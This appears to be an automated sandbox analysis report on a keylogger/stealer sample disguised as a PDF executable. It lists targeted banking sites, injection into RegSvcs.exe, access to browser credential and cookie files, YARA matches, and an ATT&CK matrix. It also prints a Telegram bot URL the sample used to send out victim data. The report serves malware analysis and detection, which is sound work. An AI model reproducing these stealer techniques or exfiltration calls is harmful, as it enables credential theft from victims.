                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003DD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: RegSvcs.exe, 00000002.00000002.4554296392.00000000040F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003DD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003DD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: RegSvcs.exe, 00000002.00000002.4554296392.00000000040F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003DD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                Source: RegSvcs.exe, 00000002.00000002.4554296392.00000000040F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: RegSvcs.exe, 00000002.00000002.4554296392.00000000040F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003DD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: RegSvcs.exe, 00000002.00000002.4554296392.00000000040F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: RegSvcs.exe, 00000002.00000002.4554296392.00000000040F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: RegSvcs.exe, 00000002.00000002.4554296392.00000000040F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003DD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003DD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: RegSvcs.exe, 00000002.00000002.4554296392.00000000040F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003DD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003DD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003DD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003DD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003DD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: RegSvcs.exe, 00000002.00000002.4548281110.00000000011C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: RegSvcs.exe, 00000002.00000002.4554296392.00000000040F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003DD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003DD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: RegSvcs.exe, 00000002.00000002.4554296392.00000000040F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003DD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003DD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: RegSvcs.exe, 00000002.00000002.4554296392.00000000040F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003DD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: RegSvcs.exe, 00000002.00000002.4554296392.00000000040F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003DD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003DD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: RegSvcs.exe, 00000002.00000002.4554296392.00000000040F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: RegSvcs.exe, 00000002.00000002.4554296392.00000000040F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                Source: RegSvcs.exe, 00000002.00000002.4554296392.00000000040F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: RegSvcs.exe, 00000002.00000002.4554296392.00000000040F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: RegSvcs.exe, 00000002.00000002.4554296392.00000000040F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: RegSvcs.exe, 00000002.00000002.4554296392.00000000040F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: RegSvcs.exe, 00000002.00000002.4554296392.00000000040F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: RegSvcs.exe, 00000002.00000002.4554296392.00000000040F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003DD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: RegSvcs.exe, 00000002.00000002.4554296392.00000000040F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeAPI call chain: ExitProcess graph end nodegraph_0-101452
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeAPI call chain: ExitProcess graph end nodegraph_0-101524
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007C3F09 BlockInput,0_2_007C3F09
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_00753B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00753B3A
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_00785A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00785A7C
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_00754B37 LoadLibraryA,GetProcAddress,0_2_00754B37
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_00E852F0 mov eax, dword ptr fs:[00000030h]0_2_00E852F0
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_00E85350 mov eax, dword ptr fs:[00000030h]0_2_00E85350
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_00E83CC0 mov eax, dword ptr fs:[00000030h]0_2_00E83CC0
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007A80A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_007A80A9
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_0077A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0077A155
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_0077A124 SetUnhandledExceptionFilter,0_2_0077A124
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                .NET source code references suspicious native API functions
                Source: 0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.raw.unpack, COVID19.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                Source: 0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.raw.unpack, FFDecryptor.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                Source: 0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.raw.unpack, FFDecryptor.csReference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: D13008Jump to behavior
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007A87B1 LogonUserW,0_2_007A87B1
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_00753B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00753B3A
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007548D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_007548D7
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007B4C7F mouse_event,0_2_007B4C7F
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe"Jump to behavior
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007A7CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_007A7CAF
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007A874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_007A874B
                Source: PK241200518-EMAIL RELEASE-pdf.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: PK241200518-EMAIL RELEASE-pdf.exeBinary or memory string: Shell_TrayWnd
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_0077862B cpuid 0_2_0077862B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_00784E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00784E87
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_00791E06 GetUserNameW,0_2_00791E06
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_00783F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00783F3A
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007549A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_007549A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected Snake Keylogger
                Source: Yara matchFile source: 00000002.00000002.4548549275.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Yara detected Telegram RAT
                Source: Yara matchFile source: 0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4547493912.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: PK241200518-EMAIL RELEASE-pdf.exe PID: 1264, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5908, type: MEMORYSTR
                Yara detected VIP Keylogger
                Source: Yara matchFile source: 0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4547493912.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: PK241200518-EMAIL RELEASE-pdf.exe PID: 1264, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5908, type: MEMORYSTR
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: PK241200518-EMAIL RELEASE-pdf.exeBinary or memory string: WIN_81
                Source: PK241200518-EMAIL RELEASE-pdf.exeBinary or memory string: WIN_XP
                Source: PK241200518-EMAIL RELEASE-pdf.exeBinary or memory string: WIN_XPe
                Source: PK241200518-EMAIL RELEASE-pdf.exeBinary or memory string: WIN_VISTA
                Source: PK241200518-EMAIL RELEASE-pdf.exeBinary or memory string: WIN_7
                Source: PK241200518-EMAIL RELEASE-pdf.exeBinary or memory string: WIN_8
                Source: PK241200518-EMAIL RELEASE-pdf.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
                Source: Yara matchFile source: 0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4547493912.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4548549275.0000000002E20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: PK241200518-EMAIL RELEASE-pdf.exe PID: 1264, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5908, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected Snake Keylogger
                Source: Yara matchFile source: 00000002.00000002.4548549275.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Yara detected Telegram RAT
                Source: Yara matchFile source: 0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4547493912.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: PK241200518-EMAIL RELEASE-pdf.exe PID: 1264, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5908, type: MEMORYSTR
                Yara detected VIP Keylogger
                Source: Yara matchFile source: 0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4547493912.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: PK241200518-EMAIL RELEASE-pdf.exe PID: 1264, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5908, type: MEMORYSTR
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007C6283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_007C6283
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007C6747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_007C6747

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		12
                Native API                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		11
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services11
                Archive Collected Data                		1
                Web Service                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts2
                Command and Scripting Interpreter                		2
                Valid Accounts                		1
                DLL Side-Loading                		11
                Deobfuscate/Decode Files or Information                		121
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		4
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
                Valid Accounts                		3
                Obfuscated Files or Information                		Security Account Manager1
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Screen Capture                		11
                Encrypted Channel                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                Access Token Manipulation                		1
                DLL Side-Loading                		NTDS127
                System Information Discovery                		Distributed Component Object Model1
                Email Collection                		3
                Non-Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                Process Injection                		2
                Valid Accounts                		LSA Secrets131
                Security Software Discovery                		SSH121
                Input Capture                		14
                Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                Virtualization/Sandbox Evasion                		Cached Domain Credentials11
                Virtualization/Sandbox Evasion                		VNC3
                Clipboard Data                		Multiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                Access Token Manipulation                		DCSync2
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job212
                Process Injection                		Proc Filesystem11
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                System Network Configuration Discovery                		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                PK241200518-EMAIL RELEASE-pdf.exe63%ReversingLabsWin32.Trojan.AutoitInject
                PK241200518-EMAIL RELEASE-pdf.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                No Antivirus matches

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                reallyfreegeoip.org
                		172.67.177.134
                		truefalse
                  		high
                  api.telegram.org
                  		149.154.167.220
                  		truefalse
                    		high
                    checkip.dyndns.com
                    		132.226.8.169
                    		truefalse
                      		high
                      checkip.dyndns.org
                      		unknown
                      		unknownfalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://reallyfreegeoip.org/xml/8.46.123.189false
                          		high
                          https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:887849%0D%0ADate%20and%20Time:%2018/12/2024%20/%2023:50:08%0D%0ACountry%20Name:%20%0D%0A%5B%20887849%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                            		high
                            http://checkip.dyndns.org/false
                              		high

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://www.office.com/RegSvcs.exe, 00000002.00000002.4548549275.0000000002F08000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4548549275.0000000002EF9000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://duckduckgo.com/chrome_newtabRegSvcs.exe, 00000002.00000002.4554296392.0000000003D61000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
